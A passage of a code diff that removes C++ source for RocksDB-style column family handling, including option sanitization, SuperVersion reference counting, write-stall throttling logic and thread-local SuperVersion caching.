-      std::min(result.min_write_buffer_number_to_merge,
-               result.max_write_buffer_number - 1);
-  if (result.min_write_buffer_number_to_merge < 1) {
-    result.min_write_buffer_number_to_merge = 1;
-  }
-
-  if (result.num_levels < 1) {
-    result.num_levels = 1;
-  }
-  if (result.compaction_style == kCompactionStyleLevel &&
-      result.num_levels < 2) {
-    result.num_levels = 2;
-  }
-
-  if (result.compaction_style == kCompactionStyleUniversal &&
-      db_options.allow_ingest_behind && result.num_levels < 3) {
-    result.num_levels = 3;
-  }
-
-  if (result.max_write_buffer_number < 2) {
-    result.max_write_buffer_number = 2;
-  }
-  if (result.max_write_buffer_number_to_maintain < 0) {
-    result.max_write_buffer_number_to_maintain = result.max_write_buffer_number;
-  }
-  // bloom filter size shouldn't exceed 1/4 of memtable size.
-  if (result.memtable_prefix_bloom_size_ratio > 0.25) {
-    result.memtable_prefix_bloom_size_ratio = 0.25;
-  } else if (result.memtable_prefix_bloom_size_ratio < 0) {
-    result.memtable_prefix_bloom_size_ratio = 0;
-  }
-
-  if (!result.prefix_extractor) {
-    assert(result.memtable_factory);
-    Slice name = result.memtable_factory->Name();
-    if (name.compare("HashSkipListRepFactory") == 0 ||
-        name.compare("HashLinkListRepFactory") == 0) {
-      result.memtable_factory = std::make_shared<SkipListFactory>();
-    }
-  }
-
-  if (result.compaction_style == kCompactionStyleFIFO) {
-    result.num_levels = 1;
-    // since we delete level0 files in FIFO compaction when there are too many
-    // of them, these options don't really mean anything
-    result.level0_slowdown_writes_trigger = std::numeric_limits<int>::max();
-    result.level0_stop_writes_trigger = std::numeric_limits<int>::max();
-  }
-
-  if (result.max_bytes_for_level_multiplier <= 0) {
-    result.max_bytes_for_level_multiplier = 1;
-  }
-
-  if (result.level0_file_num_compaction_trigger == 0) {
-    ROCKS_LOG_WARN(db_options.info_log.get(),
-                   "level0_file_num_compaction_trigger cannot be 0");
-    result.level0_file_num_compaction_trigger = 1;
-  }
-
-  if (result.level0_stop_writes_trigger <
-          result.level0_slowdown_writes_trigger ||
-      result.level0_slowdown_writes_trigger <
-          result.level0_file_num_compaction_trigger) {
-    ROCKS_LOG_WARN(db_options.info_log.get(),
-                   "This condition must be satisfied: "
-                   "level0_stop_writes_trigger(%d) >= "
-                   "level0_slowdown_writes_trigger(%d) >= "
-                   "level0_file_num_compaction_trigger(%d)",
-                   result.level0_stop_writes_trigger,
-                   result.level0_slowdown_writes_trigger,
-                   result.level0_file_num_compaction_trigger);
-    if (result.level0_slowdown_writes_trigger <
-        result.level0_file_num_compaction_trigger) {
-      result.level0_slowdown_writes_trigger =
-          result.level0_file_num_compaction_trigger;
-    }
-    if (result.level0_stop_writes_trigger <
-        result.level0_slowdown_writes_trigger) {
-      result.level0_stop_writes_trigger = result.level0_slowdown_writes_trigger;
-    }
-    ROCKS_LOG_WARN(db_options.info_log.get(),
-                   "Adjust the value to "
-                   "level0_stop_writes_trigger(%d)"
-                   "level0_slowdown_writes_trigger(%d)"
-                   "level0_file_num_compaction_trigger(%d)",
-                   result.level0_stop_writes_trigger,
-                   result.level0_slowdown_writes_trigger,
-                   result.level0_file_num_compaction_trigger);
-  }
-
-  if (result.soft_pending_compaction_bytes_limit == 0) {
-    result.soft_pending_compaction_bytes_limit =
-        result.hard_pending_compaction_bytes_limit;
-  } else if (result.hard_pending_compaction_bytes_limit > 0 &&
-             result.soft_pending_compaction_bytes_limit >
-                 result.hard_pending_compaction_bytes_limit) {
-    result.soft_pending_compaction_bytes_limit =
-        result.hard_pending_compaction_bytes_limit;
-  }
-
-  if (result.level_compaction_dynamic_level_bytes) {
-    if (result.compaction_style != kCompactionStyleLevel ||
-        db_options.db_paths.size() > 1U) {
-      // 1. level_compaction_dynamic_level_bytes only makes sense for
-      //    level-based compaction.
-      // 2. we don't yet know how to make both of this feature and multiple
-      //    DB path work.
-      result.level_compaction_dynamic_level_bytes = false;
-    }
-  }
-
-  if (result.max_compaction_bytes == 0) {
-    result.max_compaction_bytes = result.target_file_size_base * 25;
-  }
-
-  return result;
-}
-
-int SuperVersion::dummy = 0;
-void* const SuperVersion::kSVInUse = &SuperVersion::dummy;
-void* const SuperVersion::kSVObsolete = nullptr;
-
-SuperVersion::~SuperVersion() {
-  for (auto td : to_delete) {
-    delete td;
-  }
-}
-
-SuperVersion* SuperVersion::Ref() {
-  refs.fetch_add(1, std::memory_order_relaxed);
-  return this;
-}
-
-bool SuperVersion::Unref() {
-  // fetch_sub returns the previous value of ref
-  uint32_t previous_refs = refs.fetch_sub(1);
-  assert(previous_refs > 0);
-  return previous_refs == 1;
-}
-
-void SuperVersion::Cleanup() {
-  assert(refs.load(std::memory_order_relaxed) == 0);
-  imm->Unref(&to_delete);
-  MemTable* m = mem->Unref();
-  if (m != nullptr) {
-    auto* memory_usage = current->cfd()->imm()->current_memory_usage();
-    assert(*memory_usage >= m->ApproximateMemoryUsage());
-    *memory_usage -= m->ApproximateMemoryUsage();
-    to_delete.push_back(m);
-  }
-  current->Unref();
-}
-
-void SuperVersion::Init(MemTable* new_mem, MemTableListVersion* new_imm,
-                        Version* new_current) {
-  mem = new_mem;
-  imm = new_imm;
-  current = new_current;
-  mem->Ref();
-  imm->Ref();
-  current->Ref();
-  refs.store(1, std::memory_order_relaxed);
-}
-
-namespace {
-void SuperVersionUnrefHandle(void* ptr) {
-  // UnrefHandle is called when a thread exists or a ThreadLocalPtr gets
-  // destroyed. When former happens, the thread shouldn't see kSVInUse.
-  // When latter happens, we are in ~ColumnFamilyData(), no get should happen as
-  // well.
-  SuperVersion* sv = static_cast<SuperVersion*>(ptr);
-  if (sv->Unref()) {
-    sv->db_mutex->Lock();
-    sv->Cleanup();
-    sv->db_mutex->Unlock();
-    delete sv;
-  }
-}
-}  // anonymous namespace
-
-ColumnFamilyData::ColumnFamilyData(
-    uint32_t id, const std::string& name, Version* _dummy_versions,
-    Cache* _table_cache, WriteBufferManager* write_buffer_manager,
-    const ColumnFamilyOptions& cf_options, const ImmutableDBOptions& db_options,
-    const EnvOptions& env_options, ColumnFamilySet* column_family_set)
-    : id_(id),
-      name_(name),
-      dummy_versions_(_dummy_versions),
-      current_(nullptr),
-      refs_(0),
-      initialized_(false),
-      dropped_(false),
-      internal_comparator_(cf_options.comparator),
-      initial_cf_options_(SanitizeOptions(db_options, cf_options)),
-      ioptions_(db_options, initial_cf_options_),
-      mutable_cf_options_(initial_cf_options_),
-      is_delete_range_supported_(
-          cf_options.table_factory->IsDeleteRangeSupported()),
-      write_buffer_manager_(write_buffer_manager),
-      mem_(nullptr),
-      imm_(ioptions_.min_write_buffer_number_to_merge,
-           ioptions_.max_write_buffer_number_to_maintain),
-      super_version_(nullptr),
-      super_version_number_(0),
-      local_sv_(new ThreadLocalPtr(&SuperVersionUnrefHandle)),
-      next_(nullptr),
-      prev_(nullptr),
-      log_number_(0),
-      column_family_set_(column_family_set),
-      pending_flush_(false),
-      pending_compaction_(false),
-      prev_compaction_needed_bytes_(0),
-      allow_2pc_(db_options.allow_2pc) {
-  Ref();
-
-  // Convert user defined table properties collector factories to internal ones.
-  GetIntTblPropCollectorFactory(ioptions_, &int_tbl_prop_collector_factories_);
-
-  // if _dummy_versions is nullptr, then this is a dummy column family.
-  if (_dummy_versions != nullptr) {
-    internal_stats_.reset(
-        new InternalStats(ioptions_.num_levels, db_options.env, this));
-    table_cache_.reset(new TableCache(ioptions_, env_options, _table_cache));
-    if (ioptions_.compaction_style == kCompactionStyleLevel) {
-      compaction_picker_.reset(
-          new LevelCompactionPicker(ioptions_, &internal_comparator_));
-#ifndef ROCKSDB_LITE
-    } else if (ioptions_.compaction_style == kCompactionStyleUniversal) {
-      compaction_picker_.reset(
-          new UniversalCompactionPicker(ioptions_, &internal_comparator_));
-    } else if (ioptions_.compaction_style == kCompactionStyleFIFO) {
-      compaction_picker_.reset(
-          new FIFOCompactionPicker(ioptions_, &internal_comparator_));
-    } else if (ioptions_.compaction_style == kCompactionStyleNone) {
-      compaction_picker_.reset(new NullCompactionPicker(
-          ioptions_, &internal_comparator_));
-      ROCKS_LOG_WARN(ioptions_.info_log,
-                     "Column family %s does not use any background compaction. "
-                     "Compactions can only be done via CompactFiles\n",
-                     GetName().c_str());
-#endif  // !ROCKSDB_LITE
-    } else {
-      ROCKS_LOG_ERROR(ioptions_.info_log,
-                      "Unable to recognize the specified compaction style %d. "
-                      "Column family %s will use kCompactionStyleLevel.\n",
-                      ioptions_.compaction_style, GetName().c_str());
-      compaction_picker_.reset(
-          new LevelCompactionPicker(ioptions_, &internal_comparator_));
-    }
-
-    if (column_family_set_->NumberOfColumnFamilies() < 10) {
-      ROCKS_LOG_INFO(ioptions_.info_log,
-                     "--------------- Options for column family [%s]:\n",
-                     name.c_str());
-      initial_cf_options_.Dump(ioptions_.info_log);
-    } else {
-      ROCKS_LOG_INFO(ioptions_.info_log, "\t(skipping printing options)\n");
-    }
-  }
-
-  RecalculateWriteStallConditions(mutable_cf_options_);
-}
-
-// DB mutex held
-ColumnFamilyData::~ColumnFamilyData() {
-  assert(refs_.load(std::memory_order_relaxed) == 0);
-  // remove from linked list
-  auto prev = prev_;
-  auto next = next_;
-  prev->next_ = next;
-  next->prev_ = prev;
-
-  if (!dropped_ && column_family_set_ != nullptr) {
-    // If it's dropped, it's already removed from column family set
-    // If column_family_set_ == nullptr, this is dummy CFD and not in
-    // ColumnFamilySet
-    column_family_set_->RemoveColumnFamily(this);
-  }
-
-  if (current_ != nullptr) {
-    current_->Unref();
-  }
-
-  // It would be wrong if this ColumnFamilyData is in flush_queue_ or
-  // compaction_queue_ and we destroyed it
-  assert(!pending_flush_);
-  assert(!pending_compaction_);
-
-  if (super_version_ != nullptr) {
-    // Release SuperVersion reference kept in ThreadLocalPtr.
-    // This must be done outside of mutex_ since unref handler can lock mutex.
-    super_version_->db_mutex->Unlock();
-    local_sv_.reset();
-    super_version_->db_mutex->Lock();
-
-    bool is_last_reference __attribute__((unused));
-    is_last_reference = super_version_->Unref();
-    assert(is_last_reference);
-    super_version_->Cleanup();
-    delete super_version_;
-    super_version_ = nullptr;
-  }
-
-  if (dummy_versions_ != nullptr) {
-    // List must be empty
-    assert(dummy_versions_->TEST_Next() == dummy_versions_);
-    bool deleted __attribute__((unused)) = dummy_versions_->Unref();
-    assert(deleted);
-  }
-
-  if (mem_ != nullptr) {
-    delete mem_->Unref();
-  }
-  autovector<MemTable*> to_delete;
-  imm_.current()->Unref(&to_delete);
-  for (MemTable* m : to_delete) {
-    delete m;
-  }
-}
-
-void ColumnFamilyData::SetDropped() {
-  // can't drop default CF
-  assert(id_ != 0);
-  dropped_ = true;
-  write_controller_token_.reset();
-
-  // remove from column_family_set
-  column_family_set_->RemoveColumnFamily(this);
-}
-
-ColumnFamilyOptions ColumnFamilyData::GetLatestCFOptions() const {
-  return BuildColumnFamilyOptions(initial_cf_options_, mutable_cf_options_);
-}
-
-uint64_t ColumnFamilyData::OldestLogToKeep() {
-  auto current_log = GetLogNumber();
-
-  if (allow_2pc_) {
-    auto imm_prep_log = imm()->GetMinLogContainingPrepSection();
-    auto mem_prep_log = mem()->GetMinLogContainingPrepSection();
-
-    if (imm_prep_log > 0 && imm_prep_log < current_log) {
-      current_log = imm_prep_log;
-    }
-
-    if (mem_prep_log > 0 && mem_prep_log < current_log) {
-      current_log = mem_prep_log;
-    }
-  }
-
-  return current_log;
-}
-
-const double kIncSlowdownRatio = 0.8;
-const double kDecSlowdownRatio = 1 / kIncSlowdownRatio;
-const double kNearStopSlowdownRatio = 0.6;
-const double kDelayRecoverSlowdownRatio = 1.4;
-
-namespace {
-// If penalize_stop is true, we further reduce slowdown rate.
-std::unique_ptr<WriteControllerToken> SetupDelay(
-    WriteController* write_controller, uint64_t compaction_needed_bytes,
-    uint64_t prev_compaction_need_bytes, bool penalize_stop,
-    bool auto_comapctions_disabled) {
-  const uint64_t kMinWriteRate = 16 * 1024u;  // Minimum write rate 16KB/s.
-
-  uint64_t max_write_rate = write_controller->max_delayed_write_rate();
-  uint64_t write_rate = write_controller->delayed_write_rate();
-
-  if (auto_comapctions_disabled) {
-    // When auto compaction is disabled, always use the value user gave.
-    write_rate = max_write_rate;
-  } else if (write_controller->NeedsDelay() && max_write_rate > kMinWriteRate) {
-    // If user gives rate less than kMinWriteRate, don't adjust it.
-    //
-    // If already delayed, need to adjust based on previous compaction debt.
-    // When there are two or more column families require delay, we always
-    // increase or reduce write rate based on information for one single
-    // column family. It is likely to be OK but we can improve if there is a
-    // problem.
-    // Ignore compaction_needed_bytes = 0 case because compaction_needed_bytes
-    // is only available in level-based compaction
-    //
-    // If the compaction debt stays the same as previously, we also further slow
-    // down. It usually means a mem table is full. It's mainly for the case
-    // where both of flush and compaction are much slower than the speed we
-    // insert to mem tables, so we need to actively slow down before we get
-    // feedback signal from compaction and flushes to avoid the full stop
-    // because of hitting the max write buffer number.
-    //
-    // If DB just falled into the stop condition, we need to further reduce
-    // the write rate to avoid the stop condition.
-    if (penalize_stop) {
-      // Penalize the near stop or stop condition by more aggressive slowdown.
-      // This is to provide the long term slowdown increase signal.
-      // The penalty is more than the reward of recovering to the normal
-      // condition.
-      write_rate = static_cast<uint64_t>(static_cast<double>(write_rate) *
-                                         kNearStopSlowdownRatio);
-      if (write_rate < kMinWriteRate) {
-        write_rate = kMinWriteRate;
-      }
-    } else if (prev_compaction_need_bytes > 0 &&
-               prev_compaction_need_bytes <= compaction_needed_bytes) {
-      write_rate = static_cast<uint64_t>(static_cast<double>(write_rate) *
-                                         kIncSlowdownRatio);
-      if (write_rate < kMinWriteRate) {
-        write_rate = kMinWriteRate;
-      }
-    } else if (prev_compaction_need_bytes > compaction_needed_bytes) {
-      // We are speeding up by ratio of kSlowdownRatio when we have paid
-      // compaction debt. But we'll never speed up to faster than the write rate
-      // given by users.
-      write_rate = static_cast<uint64_t>(static_cast<double>(write_rate) *
-                                         kDecSlowdownRatio);
-      if (write_rate > max_write_rate) {
-        write_rate = max_write_rate;
-      }
-    }
-  }
-  return write_controller->GetDelayToken(write_rate);
-}
-
-int GetL0ThresholdSpeedupCompaction(int level0_file_num_compaction_trigger,
-                                    int level0_slowdown_writes_trigger) {
-  // SanitizeOptions() ensures it.
-  assert(level0_file_num_compaction_trigger <= level0_slowdown_writes_trigger);
-
-  if (level0_file_num_compaction_trigger < 0) {
-    return std::numeric_limits<int>::max();
-  }
-
-  const int64_t twice_level0_trigger =
-      static_cast<int64_t>(level0_file_num_compaction_trigger) * 2;
-
-  const int64_t one_fourth_trigger_slowdown =
-      static_cast<int64_t>(level0_file_num_compaction_trigger) +
-      ((level0_slowdown_writes_trigger - level0_file_num_compaction_trigger) /
-       4);
-
-  assert(twice_level0_trigger >= 0);
-  assert(one_fourth_trigger_slowdown >= 0);
-
-  // 1/4 of the way between L0 compaction trigger threshold and slowdown
-  // condition.
-  // Or twice as compaction trigger, if it is smaller.
-  int64_t res = std::min(twice_level0_trigger, one_fourth_trigger_slowdown);
-  if (res >= port::kMaxInt32) {
-    return port::kMaxInt32;
-  } else {
-    // res fits in int
-    return static_cast<int>(res);
-  }
-}
-}  // namespace
-
-void ColumnFamilyData::RecalculateWriteStallConditions(
-      const MutableCFOptions& mutable_cf_options) {
-  if (current_ != nullptr) {
-    auto* vstorage = current_->storage_info();
-    auto write_controller = column_family_set_->write_controller_;
-    uint64_t compaction_needed_bytes =
-        vstorage->estimated_compaction_needed_bytes();
-
-    bool was_stopped = write_controller->IsStopped();
-    bool needed_delay = write_controller->NeedsDelay();
-
-    if (imm()->NumNotFlushed() >= mutable_cf_options.max_write_buffer_number) {
-      write_controller_token_ = write_controller->GetStopToken();
-      internal_stats_->AddCFStats(InternalStats::MEMTABLE_COMPACTION, 1);
-      ROCKS_LOG_WARN(
-          ioptions_.info_log,
-          "[%s] Stopping writes because we have %d immutable memtables "
-          "(waiting for flush), max_write_buffer_number is set to %d",
-          name_.c_str(), imm()->NumNotFlushed(),
-          mutable_cf_options.max_write_buffer_number);
-    } else if (!mutable_cf_options.disable_auto_compactions &&
-               vstorage->l0_delay_trigger_count() >=
-                   mutable_cf_options.level0_stop_writes_trigger) {
-      write_controller_token_ = write_controller->GetStopToken();
-      internal_stats_->AddCFStats(InternalStats::LEVEL0_NUM_FILES_TOTAL, 1);
-      if (compaction_picker_->IsLevel0CompactionInProgress()) {
-        internal_stats_->AddCFStats(
-            InternalStats::LEVEL0_NUM_FILES_WITH_COMPACTION, 1);
-      }
-      ROCKS_LOG_WARN(ioptions_.info_log,
-                     "[%s] Stopping writes because we have %d level-0 files",
-                     name_.c_str(), vstorage->l0_delay_trigger_count());
-    } else if (!mutable_cf_options.disable_auto_compactions &&
-               mutable_cf_options.hard_pending_compaction_bytes_limit > 0 &&
-               compaction_needed_bytes >=
-                   mutable_cf_options.hard_pending_compaction_bytes_limit) {
-      write_controller_token_ = write_controller->GetStopToken();
-      internal_stats_->AddCFStats(
-          InternalStats::HARD_PENDING_COMPACTION_BYTES_LIMIT, 1);
-      ROCKS_LOG_WARN(
-          ioptions_.info_log,
-          "[%s] Stopping writes because of estimated pending compaction "
-          "bytes %" PRIu64,
-          name_.c_str(), compaction_needed_bytes);
-    } else if (mutable_cf_options.max_write_buffer_number > 3 &&
-               imm()->NumNotFlushed() >=
-                   mutable_cf_options.max_write_buffer_number - 1) {
-      write_controller_token_ =
-          SetupDelay(write_controller, compaction_needed_bytes,
-                     prev_compaction_needed_bytes_, was_stopped,
-                     mutable_cf_options.disable_auto_compactions);
-      internal_stats_->AddCFStats(InternalStats::MEMTABLE_SLOWDOWN, 1);
-      ROCKS_LOG_WARN(
-          ioptions_.info_log,
-          "[%s] Stalling writes because we have %d immutable memtables "
-          "(waiting for flush), max_write_buffer_number is set to %d "
-          "rate %" PRIu64,
-          name_.c_str(), imm()->NumNotFlushed(),
-          mutable_cf_options.max_write_buffer_number,
-          write_controller->delayed_write_rate());
-    } else if (!mutable_cf_options.disable_auto_compactions &&
-               mutable_cf_options.level0_slowdown_writes_trigger >= 0 &&
-               vstorage->l0_delay_trigger_count() >=
-                   mutable_cf_options.level0_slowdown_writes_trigger) {
-      // L0 is the last two files from stopping.
-      bool near_stop = vstorage->l0_delay_trigger_count() >=
-                       mutable_cf_options.level0_stop_writes_trigger - 2;
-      write_controller_token_ =
-          SetupDelay(write_controller, compaction_needed_bytes,
-                     prev_compaction_needed_bytes_, was_stopped || near_stop,
-                     mutable_cf_options.disable_auto_compactions);
-      internal_stats_->AddCFStats(InternalStats::LEVEL0_SLOWDOWN_TOTAL, 1);
-      if (compaction_picker_->IsLevel0CompactionInProgress()) {
-        internal_stats_->AddCFStats(
-            InternalStats::LEVEL0_SLOWDOWN_WITH_COMPACTION, 1);
-      }
-      ROCKS_LOG_WARN(ioptions_.info_log,
-                     "[%s] Stalling writes because we have %d level-0 files "
-                     "rate %" PRIu64,
-                     name_.c_str(), vstorage->l0_delay_trigger_count(),
-                     write_controller->delayed_write_rate());
-    } else if (!mutable_cf_options.disable_auto_compactions &&
-               mutable_cf_options.soft_pending_compaction_bytes_limit > 0 &&
-               vstorage->estimated_compaction_needed_bytes() >=
-                   mutable_cf_options.soft_pending_compaction_bytes_limit) {
-      // If the distance to hard limit is less than 1/4 of the gap between soft
-      // and
-      // hard bytes limit, we think it is near stop and speed up the slowdown.
-      bool near_stop =
-          mutable_cf_options.hard_pending_compaction_bytes_limit > 0 &&
-          (compaction_needed_bytes -
-           mutable_cf_options.soft_pending_compaction_bytes_limit) >
-              3 * (mutable_cf_options.hard_pending_compaction_bytes_limit -
-                   mutable_cf_options.soft_pending_compaction_bytes_limit) /
-                  4;
-
-      write_controller_token_ =
-          SetupDelay(write_controller, compaction_needed_bytes,
-                     prev_compaction_needed_bytes_, was_stopped || near_stop,
-                     mutable_cf_options.disable_auto_compactions);
-      internal_stats_->AddCFStats(
-          InternalStats::SOFT_PENDING_COMPACTION_BYTES_LIMIT, 1);
-      ROCKS_LOG_WARN(
-          ioptions_.info_log,
-          "[%s] Stalling writes because of estimated pending compaction "
-          "bytes %" PRIu64 " rate %" PRIu64,
-          name_.c_str(), vstorage->estimated_compaction_needed_bytes(),
-          write_controller->delayed_write_rate());
-    } else {
-      if (vstorage->l0_delay_trigger_count() >=
-          GetL0ThresholdSpeedupCompaction(
-              mutable_cf_options.level0_file_num_compaction_trigger,
-              mutable_cf_options.level0_slowdown_writes_trigger)) {
-        write_controller_token_ =
-            write_controller->GetCompactionPressureToken();
-        ROCKS_LOG_INFO(
-            ioptions_.info_log,
-            "[%s] Increasing compaction threads because we have %d level-0 "
-            "files ",
-            name_.c_str(), vstorage->l0_delay_trigger_count());
-      } else if (vstorage->estimated_compaction_needed_bytes() >=
-                 mutable_cf_options.soft_pending_compaction_bytes_limit / 4) {
-        // Increase compaction threads if bytes needed for compaction exceeds
-        // 1/4 of threshold for slowing down.
-        // If soft pending compaction byte limit is not set, always speed up
-        // compaction.
-        write_controller_token_ =
-            write_controller->GetCompactionPressureToken();
-        if (mutable_cf_options.soft_pending_compaction_bytes_limit > 0) {
-          ROCKS_LOG_INFO(
-              ioptions_.info_log,
-              "[%s] Increasing compaction threads because of estimated pending "
-              "compaction "
-              "bytes %" PRIu64,
-              name_.c_str(), vstorage->estimated_compaction_needed_bytes());
-        }
-      } else {
-        write_controller_token_.reset();
-      }
-      // If the DB recovers from delay conditions, we reward with reducing
-      // double the slowdown ratio. This is to balance the long term slowdown
-      // increase signal.
-      if (needed_delay) {
-        uint64_t write_rate = write_controller->delayed_write_rate();
-        write_controller->set_delayed_write_rate(static_cast<uint64_t>(
-            static_cast<double>(write_rate) * kDelayRecoverSlowdownRatio));
-        // Set the low pri limit to be 1/4 the delayed write rate.
-        // Note we don't reset this value even after delay condition is relased.
-        // Low-pri rate will continue to apply if there is a compaction
-        // pressure.
-        write_controller->low_pri_rate_limiter()->SetBytesPerSecond(write_rate /
-                                                                    4);
-      }
-    }
-    prev_compaction_needed_bytes_ = compaction_needed_bytes;
-  }
-}
-
-const EnvOptions* ColumnFamilyData::soptions() const {
-  return &(column_family_set_->env_options_);
-}
-
-void ColumnFamilyData::SetCurrent(Version* current_version) {
-  current_ = current_version;
-}
-
-uint64_t ColumnFamilyData::GetNumLiveVersions() const {
-  return VersionSet::GetNumLiveVersions(dummy_versions_);
-}
-
-uint64_t ColumnFamilyData::GetTotalSstFilesSize() const {
-  return VersionSet::GetTotalSstFilesSize(dummy_versions_);
-}
-
-MemTable* ColumnFamilyData::ConstructNewMemtable(
-    const MutableCFOptions& mutable_cf_options, SequenceNumber earliest_seq) {
-  return new MemTable(internal_comparator_, ioptions_, mutable_cf_options,
-                      write_buffer_manager_, earliest_seq, id_);
-}
-
-void ColumnFamilyData::CreateNewMemtable(
-    const MutableCFOptions& mutable_cf_options, SequenceNumber earliest_seq) {
-  if (mem_ != nullptr) {
-    delete mem_->Unref();
-  }
-  SetMemtable(ConstructNewMemtable(mutable_cf_options, earliest_seq));
-  mem_->Ref();
-}
-
-bool ColumnFamilyData::NeedsCompaction() const {
-  return compaction_picker_->NeedsCompaction(current_->storage_info());
-}
-
-Compaction* ColumnFamilyData::PickCompaction(
-    const MutableCFOptions& mutable_options, LogBuffer* log_buffer) {
-  auto* result = compaction_picker_->PickCompaction(
-      GetName(), mutable_options, current_->storage_info(), log_buffer);
-  if (result != nullptr) {
-    result->SetInputVersion(current_);
-  }
-  return result;
-}
-
-bool ColumnFamilyData::RangeOverlapWithCompaction(
-    const Slice& smallest_user_key, const Slice& largest_user_key,
-    int level) const {
-  return compaction_picker_->RangeOverlapWithCompaction(
-      smallest_user_key, largest_user_key, level);
-}
-
-const int ColumnFamilyData::kCompactAllLevels = -1;
-const int ColumnFamilyData::kCompactToBaseLevel = -2;
-
-Compaction* ColumnFamilyData::CompactRange(
-    const MutableCFOptions& mutable_cf_options, int input_level,
-    int output_level, uint32_t output_path_id, const InternalKey* begin,
-    const InternalKey* end, InternalKey** compaction_end, bool* conflict) {
-  auto* result = compaction_picker_->CompactRange(
-      GetName(), mutable_cf_options, current_->storage_info(), input_level,
-      output_level, output_path_id, begin, end, compaction_end, conflict);
-  if (result != nullptr) {
-    result->SetInputVersion(current_);
-  }
-  return result;
-}
-
-SuperVersion* ColumnFamilyData::GetReferencedSuperVersion(
-    InstrumentedMutex* db_mutex) {
-  SuperVersion* sv = nullptr;
-  sv = GetThreadLocalSuperVersion(db_mutex);
-  sv->Ref();
-  if (!ReturnThreadLocalSuperVersion(sv)) {
-    sv->Unref();
-  }
-  return sv;
-}
-
-SuperVersion* ColumnFamilyData::GetThreadLocalSuperVersion(
-    InstrumentedMutex* db_mutex) {
-  SuperVersion* sv = nullptr;
-  // The SuperVersion is cached in thread local storage to avoid acquiring
-  // mutex when SuperVersion does not change since the last use. When a new
-  // SuperVersion is installed, the compaction or flush thread cleans up
-  // cached SuperVersion in all existing thread local storage. To avoid
-  // acquiring mutex for this operation, we use atomic Swap() on the thread
-  // local pointer to guarantee exclusive access. If the thread local pointer
-  // is being used while a new SuperVersion is installed, the cached
-  // SuperVersion can become stale. In that case, the background thread would
-  // have swapped in kSVObsolete. We re-check the value at when returning
-  // SuperVersion back to thread local, with an atomic compare and swap.
-  // The superversion will need to be released if detected to be stale.
-  void* ptr = local_sv_->Swap(SuperVersion::kSVInUse);
-  // Invariant:
-  // (1) Scrape (always) installs kSVObsolete in ThreadLocal storage
-  // (2) the Swap above (always) installs kSVInUse, ThreadLocal storage
-  // should only keep kSVInUse before ReturnThreadLocalSuperVersion call
-  // (if no Scrape happens).
-  assert(ptr != SuperVersion::kSVInUse);
-  sv = static_cast<SuperVersion*>(ptr);
-  if (sv == SuperVersion::kSVObsolete ||
-      sv->version_number != super_version_number_.load()) {
-    RecordTick(ioptions_.statistics, NUMBER_SUPERVERSION_ACQUIRES);
-    SuperVersion* sv_to_delete = nullptr;
-
-    if (sv && sv->Unref()) {
-      RecordTick(ioptions_.statistics, NUMBER_SUPERVERSION_CLEANUPS);
-      db_mutex->Lock();
-      // NOTE: underlying resources held by superversion (sst files) might
-      // not be released until the next background job.
-      sv->Cleanup();
-      sv_to_delete = sv;
-    } else {
-      db_mutex->Lock();
-    }
-    sv = super_version_->Ref();
-    db_mutex->Unlock();
-
-    delete sv_to_delete;
-  }
-  assert(sv != nullptr);
-  return sv;
-}
-
-bool ColumnFamilyData::ReturnThreadLocalSuperVersion(SuperVersion* sv) {
-  assert(sv != nullptr);
-  // Put the SuperVersion back
-  void* expected = SuperVersion::kSVInUse;
-  if (local_sv_->CompareAndSwap(static_cast<void*>(sv), expected)) {
-    // When we see kSVInUse in the ThreadLocal, we are sure ThreadLocal
-    // storage has not been altered and no Scrape has happened. The
-    // SuperVersion is still current.
-    return true;
-  } else {
-    // ThreadLocal scrape happened in the process of this GetImpl call (after
-    // thread local Swap() at the beginning and before CompareAndSwap()).
-    // This means the SuperVersion it holds is obsolete.
-    assert(expected == SuperVersion::kSVObsolete);
-  }
-  return false;
-}
-
-SuperVersion* ColumnFamilyData::InstallSuperVersion(
-    SuperVersion* new_superversion, InstrumentedMutex* db_mutex) {
-  db_mutex->AssertHeld();
-  return InstallSuperVersion(new_superversion, db_mutex, mutable_cf_options_);
-}
-
-SuperVersion* ColumnFamilyData::InstallSuperVersion(
-    SuperVersion* new_superversion, InstrumentedMutex* db_mutex,
-    const MutableCFOptions& mutable_cf_options) {
-  new_superversion->db_mutex = db_mutex;
-  new_superversion->mutable_cf_options = mutable_cf_options;
-  new_superversion->Init(mem_, imm_.current(), current_);
-  SuperVersion* old_superversion = super_version_;
-  super_version_ = new_superversion;
-  ++super_version_number_;
-  super_version_->version_number = super_version_number_;
-  if (old_superversion != nullptr) {
-    if (old_superversion->mutable_cf_options.write_buffer_size !=
-        mutable_cf_options.write_buffer_size) {
-      mem_->UpdateWriteBufferSize(mutable_cf_options.write_buffer_size);
-    }
-  }
-
-  // Reset SuperVersions cached in thread local storage
-  ResetThreadLocalSuperVersions();
-
-  RecalculateWriteStallConditions(mutable_cf_options);
-
-  if (old_superversion != nullptr && old_superversion->Unref()) {
-    old_superversion->Cleanup();
-    return old_superversion;  // will let caller delete outside of mutex
-  }
-  return nullptr;
-}
-
-void ColumnFamilyData::ResetThreadLocalSuperVersions() {
-  autovector<void*> sv_ptrs;
-  local_sv_->Scrape(&sv_ptrs, SuperVersion::kSVObsolete);
-  for (auto ptr : sv_ptrs) {
-    assert(ptr);
-    if (ptr == SuperVersion::kSVInUse) {
-      continue;
-    }
-    auto sv = static_cast<SuperVersion*>(ptr);
-    if (sv->Unref()) {
-      sv->Cleanup();
-      delete sv;
-    }
-  }
-}
-
-#ifndef ROCKSDB_LITE
-Status ColumnFamilyData::SetOptions(
-      const std::unordered_map<std::string, std::string>& options_map) {
-  MutableCFOptions new_mutable_cf_options;
-  Status s = GetMutableOptionsFromStrings(mutable_cf_options_, options_map,
-                                          &new_mutable_cf_options);
-  if (s.ok()) {
-    mutable_cf_options_ = new_mutable_cf_options;
-    mutable_cf_options_.RefreshDerivedOptions(ioptions_);
-  }
-  return s;
-}
-#endif  // ROCKSDB_LITE
-
-ColumnFamilySet::ColumnFamilySet(const std::string& dbname,
-                                 const ImmutableDBOptions* db_options,
-                                 const EnvOptions& env_options,
-                                 Cache* table_cache,
-                                 WriteBufferManager* write_buffer_manager,
-                                 WriteController* write_controller)
-    : max_column_family_(0),
-      dummy_cfd_(new ColumnFamilyData(0, "", nullptr, nullptr, nullptr,
-                                      ColumnFamilyOptions(), *db_options,
-                                      env_options, nullptr)),
-      default_cfd_cache_(nullptr),
-      db_name_(dbname),
-      db_options_(db_options),
-      env_options_(env_options),
-      table_cache_(table_cache),
-      write_buffer_manager_(write_buffer_manager),
-      write_controller_(write_controller) {
-  // initialize linked list
